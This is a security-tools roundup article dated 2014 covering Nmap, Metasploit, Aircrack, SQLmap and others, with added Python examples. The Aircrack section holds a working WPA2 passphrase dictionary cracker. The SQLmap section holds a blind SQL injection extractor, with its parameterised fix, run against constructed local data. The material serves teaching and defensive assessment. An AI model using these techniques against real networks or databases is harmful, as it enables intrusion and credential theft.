Top 10 Security Assessment Tools

Published 2014/08/13 11:01

Vulnerabilities are unfortunately an integral part of every software and hardware system. A bug in the operating system, a loophole in a commercial product, or the misconfiguration of critical infrastructure components makes systems susceptible to attack. Malicious actors can penetrate systems through these vulnerabilities for personal or commercial gain. While this is not technically easy, there have been enough successful attempts to give cause for worry.

Earlier, it was believed that this was true only for commercial products. Yet, lately, open source systems have been cracked, resulting in data theft and a loss of reputation or money. Apart from local area networks, websites are also vulnerable and have become the prime target of crackers. In short, vulnerabilities can be exploited from within the organisation, as well as over the Internet by unknown people.

On the bright side, with the number of attacks increasing, there is now a slew of tools to detect and stop malware and cracking attempts. The open source world has many such utilities (and distros). Here, I must mention BackTrack Linux, which has gained international fame for its wide range of vulnerability assessment and digital forensics utilities (its successor, Kali Linux, carries the same toolset forward). The most recent version also contains powerful wireless vulnerability testing tools.

Though there are literally hundreds of tools, I have selected the top 10 based on the fact that no other tool can really replace them. The primary selection criteria have been the feature set, how widespread the product is within the security community, and simplicity.

Please refer to Figure 1, which shows the top five tools I chose for network assessment, while Figure 2 shows the leading Web vulnerability scanning products. Of course, only FOSS tools are mentioned. I have presented the tools in the order that they are expected to be used to detect vulnerabilities; this should provide a systematic approach to readers who wish to make a career as certified penetration testers.

Figure 1: Top 5 network security scanners

Figure 2: Top 5 web security scanners

The top 5 network security assessment tools

Vulnerability scanning of a network needs to be done both from inside the network and from outside it (from both sides of the firewall). The approach I would suggest is to start with a network evaluation phase, in which traffic is sniffed and hosts and services are enumerated. The data gathered there is then used in the attack phase to exploit the exposed vulnerabilities.


Wireshark

The very first step in vulnerability assessment is to get a clear picture of what is happening on the network. Wireshark (previously named Ethereal) puts the interface into promiscuous mode and captures all traffic that reaches it in the local (Layer 2) broadcast domain. On a switched network that means broadcast and multicast traffic plus the capturing host's own conversations; to see other hosts' unicast traffic you need a mirror (SPAN) port on the switch or a network tap.

Customised filters can be set to intercept specific traffic; for example, to capture communication between two IP addresses, or to capture UDP-based DNS queries on the network. Traffic can be dumped into a capture file and reviewed later, and additional (display) filters can be applied during the review.

Typically, the tester is looking for stray IP addresses, spoofed packets, unexpected packet drops or retransmissions, and suspicious packet generation from a single IP address. Wireshark gives a broad and clear picture of what is happening on the network.

However, it has no intelligence of its own and should be treated as a data provider. Thanks to its GUI, anyone with some basic networking knowledge can use it.
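To make the filtering concrete, here is an added example (my own code, not part of the original article and not Wireshark's): a minimal pcap reader that applies the two filters mentioned above and counts packets per source host. The equivalent Wireshark display filters are `ip.addr == A && ip.addr == B` and `udp.dstport == 53 && dns.flags.response == 0`. The capture, MAC addresses and IP addresses are constructed in memory so the code runs offline; checksums are left zero because nothing here validates them.

```python
import socket
import struct
from collections import Counter

# Added example (not from the article): a tiny pcap reader with the kind of
# filters Wireshark applies. The capture below is constructed in memory.

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1
MAC_A, MAC_B = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # assumed addresses


def ipv4_frame(src_ip, dst_ip, proto, l4):
    """Ethernet II + IPv4 header around an L4 segment (checksums left zero; not validated here)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return MAC_A + MAC_B + b"\x08\x00" + ip + l4


def udp_segment(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


def tcp_syn(sport, dport):
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0)


def dns_query(name):
    """A standard DNS A query: 12-byte header, QNAME labels, QTYPE=A, QCLASS=IN."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)


def build_pcap(frames):
    """Serialise frames as a little-endian pcap file (24-byte global header, 16-byte record headers)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000, i, len(f), len(f)) + f
    return out


def decode_frame(frame):
    """Ethernet -> IPv4 -> TCP/UDP. Returns a dict, or None for non-IPv4 frames."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
        return None
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[23]
    pkt = {"src": socket.inet_ntoa(frame[26:30]), "dst": socket.inet_ntoa(frame[30:34]), "proto": proto}
    l4 = frame[14 + ihl:]
    if proto in (6, 17) and len(l4) >= 8:
        pkt["sport"], pkt["dport"] = struct.unpack_from("!HH", l4, 0)
        hdr_len = 8 if proto == 17 else (l4[12] >> 4) * 4  # UDP is fixed size; TCP carries its data offset
        pkt["payload"] = l4[hdr_len:]
    return pkt


def parse_pcap(data):
    magic = struct.unpack_from("<I", data, 0)[0]
    endian = "<" if magic == PCAP_MAGIC else ">"  # reading 0xD4C3B2A1 here means a big-endian file
    if struct.unpack_from(endian + "I", data, 20)[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off, packets = 24, []
    while off + 16 <= len(data):
        _sec, _usec, incl, _orig = struct.unpack_from(endian + "IIII", data, off)
        pkt = decode_frame(data[off + 16:off + 16 + incl])
        if pkt:
            packets.append(pkt)
        off += 16 + incl
    return packets


def between_hosts(packets, a, b):
    """Wireshark: ip.addr == a && ip.addr == b"""
    return [p for p in packets if {p["src"], p["dst"]} == {a, b}]


def dns_qname(payload):
    labels, off = [], 12
    while off < len(payload) and payload[off]:
        n = payload[off]
        labels.append(payload[off + 1:off + 1 + n].decode("ascii", "replace"))
        off += 1 + n
    return ".".join(labels)


def dns_queries(packets):
    """Wireshark: udp.dstport == 53 && dns.flags.response == 0  ->  (source, queried name)"""
    out = []
    for p in packets:
        payload = p.get("payload", b"")
        if p["proto"] == 17 and p.get("dport") == 53 and len(payload) > 12:
            if not struct.unpack_from("!H", payload, 2)[0] & 0x8000:  # QR bit clear: a query
                out.append((p["src"], dns_qname(payload)))
    return out


def packets_per_source(packets):
    """Spot one host generating suspicious volumes (Wireshark: Statistics > Endpoints)."""
    return Counter(p["src"] for p in packets)


# Constructed sample: two DNS lookups, one legitimate TCP SYN, and a burst of SYNs from a single host.
SAMPLE_CAPTURE = build_pcap(
    [ipv4_frame("10.0.0.5", "10.0.0.53", 17, udp_segment(40001, 53, dns_query("example.com"))),
     ipv4_frame("10.0.0.7", "10.0.0.53", 17, udp_segment(40002, 53, dns_query("internal.corp"))),
     ipv4_frame("10.0.0.5", "10.0.0.9", 6, tcp_syn(40003, 443))]
    + [ipv4_frame("10.0.0.99", "10.0.0.9", 6, tcp_syn(50000 + i, port))
       for i, port in enumerate((21, 22, 23, 80, 3389))]
)

if __name__ == "__main__":
    pkts = parse_pcap(SAMPLE_CAPTURE)
    print(dns_queries(pkts))
    print(between_hosts(pkts, "10.0.0.5", "10.0.0.53"))
    print(packets_per_source(pkts).most_common(1))
```

The per-source counter is the programmatic version of what Wireshark's Endpoints statistics show: the host with five SYNs to five different ports is the one a tester would look at first.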


Nmap

This is probably the only tool to have remained popular for well over a decade. The scanner crafts its own packets and performs scans at a granular TCP level (SYN scan, ACK scan and so on). It has built-in fingerprinting that guesses the OS and version from network responses, such as the details of a TCP handshake.

Nmap is effective at detecting remote devices and, in most cases, correctly identifies firewalls, routers, and their make and model. Network administrators can use Nmap to check which ports are open, and whether those ports can be exploited further in simulated attacks. Its normal output is verbose plain text, and it can also write greppable (-oG) and XML (-oX) output; the XML form is the one to parse when scripting routine tasks or collecting evidence for an audit report.

You can read the series of Nmap articles published earlier for a better understanding.
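As an added example of scripting Nmap for audit work (my own code, not from the article or the Nmap project), the block below parses the XML that a run such as `nmap -sS -sV -O -oX scan.xml 192.0.2.0/28` writes, checks the open ports against an allowed-ports policy, and diffs two scans to produce change evidence. The XML is a constructed sample in Nmap's format with made-up hosts; the policy dictionary and function names are my own.

```python
import xml.etree.ElementTree as ET

# Added example (not from the article or the Nmap project). The XML below is a
# constructed sample in the shape of `nmap -sS -sV -O -oX scan.xml <targets>` output.

SAMPLE_SCAN = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -O -oX scan.xml 192.0.2.0/28" version="7.94">
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.10" addrtype="ipv4"/><address addr="00:0C:29:3E:12:7A" addrtype="mac"/>
<hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
<ports><extraports state="closed" count="997"/>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="8.9p1" method="probed" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="Apache httpd" version="2.4.52" method="probed" conf="10"/></port>
<port protocol="tcp" portid="3306"><state state="open" reason="syn-ack"/>
<service name="mysql" product="MySQL" version="8.0.32" method="probed" conf="10"/></port>
<port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/></port>
</ports>
<os><osmatch name="Linux 5.0 - 5.4" accuracy="95" line="69000"/></os>
</host>
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.11" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
<service name="microsoft-ds" method="table" conf="3"/></port></ports>
<os><osmatch name="Microsoft Windows Server 2019" accuracy="88" line="100"/></os>
</host>
<host><status state="down" reason="no-response"/><address addr="192.0.2.12" addrtype="ipv4"/></host>
<runstats><finished elapsed="12.3"/><hosts up="2" down="1" total="3"/></runstats>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """One record per live host: address, hostname, open ports with service banner, best OS guess."""
    hosts = []
    for h in ET.fromstring(xml_text).iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = next((a.get("addr") for a in h.findall("address") if a.get("addrtype") == "ipv4"), None)
        name = next((n.get("name") for n in h.iter("hostname")), None)
        ports = []
        for p in h.iter("port"):
            state = p.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed and filtered ports are noise for the audit summary
            svc = p.find("service")
            banner = " ".join(x for x in (svc.get("product"), svc.get("version")) if x) if svc is not None else ""
            ports.append({"port": int(p.get("portid")), "proto": p.get("protocol"),
                          "service": svc.get("name") if svc is not None else None, "banner": banner})
        osm = h.find(".//osmatch")  # Nmap lists osmatch entries best-first
        hosts.append({"ip": ip, "hostname": name, "open_ports": ports,
                      "os": osm.get("name") if osm is not None else None,
                      "os_accuracy": int(osm.get("accuracy")) if osm is not None else 0})
    return hosts


def policy_violations(hosts, allowed):
    """`allowed` maps ip -> set of (proto, port) the host may expose; any other open port is a finding."""
    findings = []
    for h in hosts:
        for p in h["open_ports"]:
            if (p["proto"], p["port"]) not in allowed.get(h["ip"], set()):
                findings.append((h["ip"], p["proto"], p["port"], p["service"], p["banner"]))
    return findings


def diff_scans(baseline_xml, current_xml):
    """Ports newly opened / newly closed since the baseline scan, per host (evidence for a change audit)."""
    def port_map(xml_text):
        return {h["ip"]: {(p["proto"], p["port"]) for p in h["open_ports"]} for h in parse_nmap_xml(xml_text)}
    before, after = port_map(baseline_xml), port_map(current_xml)
    return {ip: {"opened": sorted(after.get(ip, set()) - before.get(ip, set())),
                 "closed": sorted(before.get(ip, set()) - after.get(ip, set()))}
            for ip in before.keys() | after.keys()}


if __name__ == "__main__":
    policy = {"192.0.2.10": {("tcp", 22), ("tcp", 80)}}  # assumed policy: web01 may expose only SSH and HTTP
    for finding in policy_violations(parse_nmap_xml(SAMPLE_SCAN), policy):
        print("unexpected open port:", finding)
```

Hosts that are not up, and ports reported as closed or filtered, are dropped deliberately: an audit report should list what is reachable, and a scheduled run of `diff_scans` against last week's XML is the cheapest way to notice a port that somebody opened in between.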


Metasploit

Once sniffing and scanning are done with the above tools, it is time to move to the OS and application level. Metasploit is a powerful open source exploitation framework: it runs exploit and auxiliary modules against a set of IP addresses to confirm that the vulnerabilities found so far are actually exploitable.

Unlike many other frameworks, it can also be used to test defences. A programmer can write an exploit for a particular vulnerability, package it with Metasploit's payload encoders, and check whether the result is picked up by the target's antivirus or intrusion detection. The process also works in reverse: when malware exploits a previously unknown vulnerability, a Metasploit module for it can be used to verify that the patch really closes the hole.

Although Rapid7 sells commercial editions, I have included it here because the Metasploit Framework itself is open source (BSD licensed) and the free edition carries the full set of exploit modules.


OpenVAS

The Nessus scanner is a famous commercial utility; OpenVAS branched off from it a few years back, when Nessus went closed source, in order to remain open source. Metasploit and OpenVAS are often mentioned together, but there is a distinct difference: OpenVAS detects and reports vulnerabilities, whereas Metasploit exploits them.

OpenVAS is split into two major components, a scanner and a manager. A scanner sits on a host with network reach to the targets (not on the targets themselves) and feeds its vulnerability findings to the manager. The manager collects input from multiple scanners and applies its own logic to produce a report.

In the security world, OpenVAS is regarded as very stable and reliable for detecting the latest security loopholes, and for providing reports and guidance to fix them. The built-in Greenbone Security Assistant provides a web dashboard listing all vulnerabilities and the affected machines on the network.

Creating detailed reports is one thing that makes OpenVAS a tool favoured by infrastructure security managers.


Aircrack

The list of network scanners would be incomplete without wireless security scanners. Today's infrastructure contains wireless devices in the data centre as well as on corporate premises to serve mobile users. While WPA2 is considered adequate for 802.11 WLANs, misconfiguration and the use of over-simple passphrases leave such networks open to attack.

Aircrack (now maintained as Aircrack-ng) is a suite of utilities that acts as sniffer, packet injector and packet decoder. The targeted wireless network is monitored, and injected with traffic if necessary, to capture the vital material: for WPA/WPA2 that is the four-way handshake between a client and the access point. A cracker is then run against the captured file with a dictionary or brute force to recover the passphrase. The passphrase itself is never sent over the air, so once a handshake has been captured its strength is the only thing protecting the network. Aircrack works on most Linux distros, but the build in BackTrack Linux is highly preferred.
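To show why a captured handshake plus a weak passphrase is enough, here is an added example (my own code, not from the article or the Aircrack-ng project) of the WPA2-PSK key derivation an offline cracker replays: PBKDF2 turns passphrase and SSID into the PMK, the PRF expands it into the PTK, and the first 16 bytes of the PTK check the MIC on the captured EAPOL frame. The handshake is constructed here from a known passphrase with fixed MAC addresses and nonces (all assumed values) so that the code runs without a wireless card; against a real capture the same three steps apply.

```python
import hashlib
import hmac
import struct

# Added example (not from the article or Aircrack-ng): WPA2-PSK derivation as
# replayed by a dictionary attack. The "capture" is constructed from a known passphrase.


def derive_pmk(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). This is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces); bytes 0..15 are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return ptk[:64]


def eapol_mic(kck, eapol_zero_mic):
    """Key descriptor version 2 (AES-CCMP): MIC = first 128 bits of HMAC-SHA1 over the frame with its MIC zeroed."""
    return hmac.new(kck, eapol_zero_mic, hashlib.sha1).digest()[:16]


def eapol_message2(snonce, key_data):
    """EAPOL-Key message 2 of the handshake with the MIC field zeroed (the form the MIC is computed over)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + b"\x00" * 8 + snonce + b"\x00" * 16
            + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + struct.pack("!H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack("!H", len(body)) + body


def crack_psk(handshake, wordlist):
    """Dictionary attack: derive PMK -> PTK -> MIC per candidate and compare with the captured MIC."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, handshake["ssid"])
        kck = derive_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol_zero_mic"]), handshake["mic"]):
            return candidate
    return None


def make_handshake(ssid, passphrase):
    """Constructed stand-in for a real capture: fixed MACs and nonces, and a genuine MIC under `passphrase`."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2/CCMP/PSK, as a client sends it
    eapol = eapol_message2(snonce, rsn_ie)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "snonce": snonce,
            "eapol_zero_mic": eapol, "mic": eapol_mic(kck, eapol)}


if __name__ == "__main__":
    hs = make_handshake("CorpGuest", "summer2014")
    print(crack_psk(hs, ["password", "letmein", "summer2014", "correct horse battery staple"]))
```

The 4096 PBKDF2 iterations are the only cost per guess, and they are pre-computable per SSID, which is why a common network name plus a dictionary word falls in seconds while a long random passphrase does not.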

The top five Web security assessment tools

Scanning websites is an entirely different ballgame from network scans. For websites the scope runs across the whole stack, from the network layers up to Layer 7, which is where most of today's vulnerabilities live. The correct approach starts from web-level access and works through to all backend components such as databases. While most web security scanners are automated, manual scripting may be needed depending on the situation.


Nikto

Let's start with this tool because of its feature set. This open source tool is widely used to scan web servers, mainly because it supports HTTP and HTTPS and reports findings as the scan proceeds. Nikto is not a crawler that follows links as a human would; it runs a large database of checks for dangerous files and CGIs, outdated server software and misconfigurations against the server, and does so in very little time. Its mutation options combine those checks (for example, trying every known file name in every discovered directory) to form further tests based on the web server configuration and the hosted code.

Thus, it finds loopholes such as file upload misconfiguration, improper cookie handling, cross-site scripting and so on. Nikto dumps all findings in a verbose mode, which helps in understanding the web vulnerabilities in detail. However, this can also produce a flood of notifications, some of which will be false positives (a "found" file that is merely the server's catch-all 200 response, for instance), so care should be taken when interpreting Nikto logs.

Samurai framework

Once a baseline check has been performed with Nikto, the next step is the "deep-dive" approach. Samurai is a framework: a bundle of powerful utilities, each targeted at a specific set of vulnerabilities.

It comes as a Linux distribution focused purely on penetration-testing tools, such as WebScarab for HTTP mapping and w3af plugins for application-level attacks, and it also includes tools to test browser-based exploits. It is remarkable that the most recent version can find vulnerabilities that even some commercial products usually miss.

Safe3 scanner

While the first two tools are good for static websites, portals that need a user ID and password call for something that can deal with HTTP sessions and cookies. Safe3 scanner is a fantastic open source project which has gained momentum and fame because it can handle almost all types of authentication, including NTLM.

It contains a web crawler (a spider like those of search engines) that avoids scanning duplicate pages and yet still detects client-side JavaScript vulnerabilities. Safe3 scans also detect the possibility of the latest AJAX-based attacks and even report vulnerable script libraries. It comes with a user-friendly GUI and can produce clear management reports.
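What "ignoring duplicate pages" means in a scanner's crawler is worth spelling out, so here is an added example (my own code, not from the article or Safe3): URLs are normalised (case, default port, fragment, tracking parameters, query order) and then reduced to a page template in which parameter values are dropped, so that `/item?id=42` and `/item?id=43` are scanned once but `/item?id=43&sort=price` still counts as a new set of injection points. The list of ignored parameter names and the sample URLs are assumptions of the example.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Added example (not from the article or Safe3): crawler-side duplicate detection
# that keeps one representative URL per handler and parameter set.

IGNORED_PARAMS = {"utm_source", "utm_medium", "utm_campaign", "phpsessid", "jsessionid"}  # assumed list
NUMERIC = re.compile(r"^\d+$")


def normalize_url(url):
    """Canonical form: lower-case scheme/host, default port and fragment dropped, tracking params removed, query sorted."""
    p = urlsplit(url.strip())
    host = (p.hostname or "").lower()
    if p.port and (p.scheme.lower(), p.port) not in (("http", 80), ("https", 443)):
        host = f"{host}:{p.port}"
    query = sorted((k, v) for k, v in parse_qsl(p.query, keep_blank_values=True)
                   if k.lower() not in IGNORED_PARAMS)
    return urlunsplit((p.scheme.lower(), host, p.path or "/", urlencode(query), ""))


def page_template(url):
    """URLs that differ only in values hit the same handler: /item/42?id=7 and /item/43?id=9 share a template."""
    p = urlsplit(normalize_url(url))
    path = "/".join("{n}" if NUMERIC.match(seg) else seg for seg in p.path.split("/"))
    params = ",".join(sorted(k for k, _ in parse_qsl(p.query, keep_blank_values=True)))
    return f"{p.scheme}://{p.netloc}{path}?{params}"


def unique_scan_targets(urls):
    """Return {template: first normalised URL seen}, so each handler/parameter set is tested once."""
    targets = {}
    for u in urls:
        targets.setdefault(page_template(u), normalize_url(u))
    return targets


# Constructed sample of what a spider might collect from one site.
CRAWLED = [
    "HTTP://Shop.Example.test:80/item?id=42&utm_source=mail#reviews",
    "http://shop.example.test/item?id=43",
    "http://shop.example.test/item?id=43&sort=price",
    "http://shop.example.test/category/12/",
    "http://shop.example.test/category/13/",
    "http://shop.example.test/search?q=shoes",
    "http://shop.example.test/search?utm_campaign=x&q=boots",
]

if __name__ == "__main__":
    for template, example in unique_scan_targets(CRAWLED).items():
        print(template, "<-", example)
```

Seven crawled URLs collapse to four scan targets here. The trade-off is deliberate: collapsing on parameter names rather than values keeps the scan short, but a handler that behaves differently for particular values (an admin `id`, say) will only be exercised with the first value seen.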


Websecurify

Though very similar to Samurai, Websecurify also brings application-level assessment into play. In a large web farm where code is maintained by a team of developers, following coding standards can still yield insecure code: passwords left in scripts, physical file paths exposed by libraries or error pages, and so on. Websecurify exercises the running application and spots such leaks swiftly wherever they surface in its responses.

A nice feature is that it can take screenshots of the problem areas automatically, which helps in preparing audit reports. It is one of the very few platform-independent tools and also supports testing mobile applications, which is helping it gain popularity in the cyber-security assessment world.


SQLmap

This article would not be complete without a tool for detecting SQL injection. Though this is a very old, "first-generation" class of attack, many public websites still fail to fix it. SQLmap not only detects and exploits SQL injection faults but, where the database's privileges allow, can also take over the database server (for example via its --os-shell option). Since it focuses on one task, it works at great speed: fingerprinting the database, identifying the underlying file system and OS, and eventually fetching data from the server. It supports almost all well-known database engines and can also run dictionary attacks on the password hashes it retrieves. It can be combined with the four tools above to scan a website aggressively.
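To see what sqlmap automates, here is an added example (my own code, not from the article or the sqlmap project) with an injectable query next to its parameterised fix, and the boolean-based blind technique that reads data out of the vulnerable version one character at a time even though the application only ever answers "found" or "not found". It uses an in-memory SQLite database with constructed rows; the table, the user names and the hashes are made up for the example.

```python
import sqlite3
from functools import partial

# Added example (not from the article or sqlmap): the injectable query, the
# boolean-based blind extraction sqlmap performs against it, and the fixed query.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (name, password_hash) VALUES (?, ?)",
                     [("alice", "5f4dcc3b5aa765d61d8327deb882cf99"),   # constructed rows
                      ("bob", "e10adc3949ba59abbe56e057f20f883e")])
    return conn


def user_exists_vulnerable(conn, user_id):
    """VULNERABLE: the request parameter is pasted into the SQL text, so `1 AND <expr>` becomes part of the query."""
    row = conn.execute(f"SELECT id FROM users WHERE id = {user_id}").fetchone()
    return row is not None


def user_exists_fixed(conn, user_id):
    """FIXED: a bound parameter is always data; `1 AND 1=1` is compared with `id` as a literal and matches nothing."""
    row = conn.execute("SELECT id FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind extraction. `oracle(payload)` only returns True/False, yet the result of
    `subquery` is read one character at a time by binary search over printable ASCII (about 7 requests per character)."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"1 AND length(({subquery})) >= {pos}"):
            break  # past the end of the value
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def demo():
    conn = make_db()
    vulnerable = partial(user_exists_vulnerable, conn)
    # Fingerprint first (sqlmap does the same), then pull a secret.
    table = blind_extract(vulnerable, "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1")
    secret = blind_extract(vulnerable, "SELECT password_hash FROM users WHERE name='alice'")
    # The same payloads against the fixed function never evaluate true, so nothing can be read out.
    leaked_from_fixed = blind_extract(partial(user_exists_fixed, conn),
                                      "SELECT password_hash FROM users WHERE name='alice'")
    return table, secret, leaked_from_fixed


if __name__ == "__main__":
    print(demo())
```

The hash is 32 characters long, so the extraction costs roughly 32 × 7 boolean requests plus one length probe per position; sqlmap's time-based and error-based techniques are variations on the same oracle idea. The fix is not input filtering but parameter binding: the third value `demo()` returns is the empty string because the bound parameter never becomes SQL.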

A vulnerability assessment toolkit should cover network scanning as well as website vulnerability exploitation. Open source software is prone to attacks too; hence network administrators must know the reputed scanners and use them in their daily tasks to keep their infrastructure secure and stable.

